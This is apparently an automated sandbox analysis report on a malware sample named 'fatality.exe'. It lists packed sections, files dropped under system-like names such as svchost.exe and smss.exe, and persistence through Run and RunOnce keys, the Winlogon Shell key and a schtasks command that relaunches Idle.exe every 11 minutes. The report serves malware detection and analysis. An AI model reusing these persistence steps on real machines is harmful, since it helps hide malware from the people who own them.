                                      Source: C:\blockcomSession\containerReview.exeSection loaded: appresolver.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: bcp47langs.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: slc.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: sppc.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: onecorecommonproxystub.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: onecoreuapcommonproxystub.dll
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: msvbvm60.dll
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: vb6zz.dll
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sxs.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: mscoree.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: apphelp.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: version.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: uxtheme.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: windows.storage.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: wldp.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: profapi.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: cryptsp.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: rsaenh.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: cryptbase.dll
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: mscoree.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: apphelp.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: version.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: profapi.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: cryptsp.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: rsaenh.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: cryptbase.dll
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: mscoree.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: apphelp.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: kernel.appcore.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: version.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: uxtheme.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: windows.storage.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: wldp.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: profapi.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: cryptsp.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: rsaenh.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: cryptbase.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: sspicli.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: mscoree.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: kernel.appcore.dll
                                      Source: C:\blockcomSession\Idle.exeSection loaded: version.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: mscoree.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: apphelp.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: kernel.appcore.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: version.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: uxtheme.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: windows.storage.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: wldp.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: profapi.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: cryptsp.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: rsaenh.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: cryptbase.dll
                                      Source: C:\blockcomSession\smss.exeSection loaded: sspicli.dll
                                      Source: C:\Users\user\Desktop\fatality.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                      Source: Window RecorderWindow detected: More than 3 window changes detected
                                      Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                      Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\Mozilla Firefox\fonts\c0a39dc94da3cf
                                      Source: fatality.exeStatic file information: File size 3457619 > 1048576
                                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: fatality.exe , fatality.exe , 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp
                                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.pdb source: containerReview.exe, 0000000D.00000002.1906268968.0000000003BB0000.00000004.00000800.00020000.00000000.sdmp

                                      Data Obfuscation

                                      Source: C:\Windows\Resources\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B196B287-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32
                                      Source: C:\Users\user\Desktop\fatality.exe Unpacked PE file: 1.2.fatality.exe .8e0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;.rsrc:EW;Unknown_Section7:EW;cheat:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:W;Unknown_Section4:R;Unknown_Section5:R;.rsrc:EW;Unknown_Section7:EW;cheat:EW;
                                      Source: C:\blockcomSession\containerReview.exeUnpacked PE file: 13.2.containerReview.exe.3250000.5.unpack
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline"
                                      Source: C:\Users\user\Desktop\fatality.exe File created: C:\blockcomSession\__tmp_rar_sfx_access_check_3774000
                                      Source: explorer.exe.2.drStatic PE information: real checksum: 0x4bf451a should be: 0x2a8ed
                                      Source: fatality.exe .0.drStatic PE information: real checksum: 0x0 should be: 0x338c7e
                                      Source: fatality.exeStatic PE information: real checksum: 0x4bf451a should be: 0x35791e
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe1.13.drStatic PE information: real checksum: 0x0 should be: 0x1f98e7
                                      Source: spoolsv.exe.3.drStatic PE information: real checksum: 0x4bf451a should be: 0x29915
                                      Source: icsys.icn.exe.0.drStatic PE information: real checksum: 0x4bf451a should be: 0x22717
                                      Source: containerReview.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x1f98e7
                                      Source: svchost.exe.4.drStatic PE information: real checksum: 0x4bf451a should be: 0x2c3b9
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe0.13.drStatic PE information: real checksum: 0x0 should be: 0x1f98e7
                                      Source: Idle.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x1f98e7
                                      Source: SecurityHealthSystray.exe.19.drStatic PE information: real checksum: 0x0 should be: 0xe3ae
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x1f98e7
                                      Source: smss.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x1f98e7
                                      Source: fatality.exe .0.drStatic PE information: section name:
                                      Source: fatality.exe .0.drStatic PE information: section name: cheat
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008FF640 push ecx; ret 1_2_008FF653
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008FEB78 push eax; ret 1_2_008FEB96
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0090DDED push dword ptr [esp+ecx-75h]; iretd 1_2_0090DDF1
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0096B28C push 0096B6D8h; ret 1_2_0096B6D0
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009743A0 push 00974400h; ret 1_2_009743F8
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009633EA push 00963418h; ret 1_2_00963410
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00963494 push 009634C0h; ret 1_2_009634B8
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009634F8 push 0096352Ch; ret 1_2_00963524
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00963424 push 00963450h; ret 1_2_00963448
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00974456 push 009745A4h; ret 1_2_0097459C
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00975454 push 009754A1h; ret 1_2_00975499
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0096345C push 00963488h; ret 1_2_00963480
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009615F0 push 00961641h; ret 1_2_00961639
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00973536 push 009735B5h; ret 1_2_009735AD
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00974684 push ecx; mov dword ptr [esp], ecx 1_2_00974687
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009726A4 push 0097274Ch; ret 1_2_00972744
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0096B6DA push 0096B74Bh; ret 1_2_0096B743
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0097262C push 009726A2h; ret 1_2_0097269A
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0097274E push 0097279Ch; ret 1_2_00972794
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009618AA push 009618D8h; ret 1_2_009618D0
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_009748F4 push ecx; mov dword ptr [esp], ecx 1_2_009748F6
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00973804 push 00973830h; ret 1_2_00973828
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0096B85E push 0096B88Ch; ret 1_2_0096B884
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00961968 push 00961994h; ret 1_2_0096198C
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00962A48 push ecx; mov dword ptr [esp], eax 1_2_00962A49
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00962CF2 push 00962D20h; ret 1_2_00962D18
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00962D2C push 00962D58h; ret 1_2_00962D50
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0096AD60 push ecx; mov dword ptr [esp], edx 1_2_0096AD65
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0095DF90 push eax; ret 1_2_0095DFCC
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0493515E push ecx; retf 1_2_0493515F
                                      Source: C:\Windows\Resources\Themes\explorer.exeCode function: 3_2_0339FC55 push eax; iretd 3_2_0339FC5D
                                      Source: fatality.exe .0.drStatic PE information: section name: entropy: 7.996600566459323
                                      Source: fatality.exe .0.drStatic PE information: section name: entropy: 7.979119292488003
                                      Source: fatality.exe .0.drStatic PE information: section name: entropy: 7.461008587981874
                                      Source: fatality.exe .0.drStatic PE information: section name: entropy: 7.941503255275258
                                      Source: fatality.exe .0.drStatic PE information: section name: entropy: 7.853249739854464
                                      Source: fatality.exe .0.drStatic PE information: section name: .rsrc entropy: 7.51495699813517
                                      Source: fatality.exe .0.drStatic PE information: section name: cheat entropy: 7.982180837051556
                                      Source: containerReview.exe.1.drStatic PE information: section name: .text entropy: 7.568689515066778
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe.13.drStatic PE information: section name: .text entropy: 7.568689515066778
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe0.13.drStatic PE information: section name: .text entropy: 7.568689515066778
                                      Source: smss.exe.13.drStatic PE information: section name: .text entropy: 7.568689515066778
                                      Source: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe1.13.drStatic PE information: section name: .text entropy: 7.568689515066778
                                      Source: Idle.exe.13.drStatic PE information: section name: .text entropy: 7.568689515066778

                                      Persistence and Installation Behavior

                                      Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: C:\Windows\Resources\Themes\explorer.exe
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\blockcomSession\smss.exe
                                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exe
                                      Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exe
                                      Source: C:\blockcomSession\containerReview.exeFile written: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                      Source: C:\Windows\Resources\svchost.exeExecutable created and started: c:\windows\resources\spoolsv.exe
                                      Source: C:\Users\user\Desktop\fatality.exeExecutable created and started: C:\Windows\Resources\Themes\icsys.icn.exe
                                      Source: C:\Windows\System32\svchost.exeExecutable created and started: c:\windows\resources\themes\explorer.exe
                                      Source: C:\Windows\Resources\spoolsv.exeExecutable created and started: c:\windows\resources\svchost.exe
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exe
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\blockcomSession\Idle.exe
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                      Source: C:\Users\user\Desktop\fatality.exe File created: C:\blockcomSession\containerReview.exe
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\zRrwKlet.log
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\FJTVnRjh.log
                                      Source: C:\Users\user\Desktop\fatality.exeFile created: C:\Users\user\Desktop\fatality.exe 
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\hEPrrPJe.log
                                      Source: C:\Users\user\Desktop\fatality.exeFile created: C:\Windows\Resources\Themes\icsys.icn.exe
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\ZKzjsAAu.log
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\SdSCeHzI.log
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\XWvbHmEw.log

                                      Boot Survival

                                      Source: C:\blockcomSession\containerReview.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReview
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smss
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\blockcomSession\Idle.exe'" /f
                                      Source: C:\Windows\Resources\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccessJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
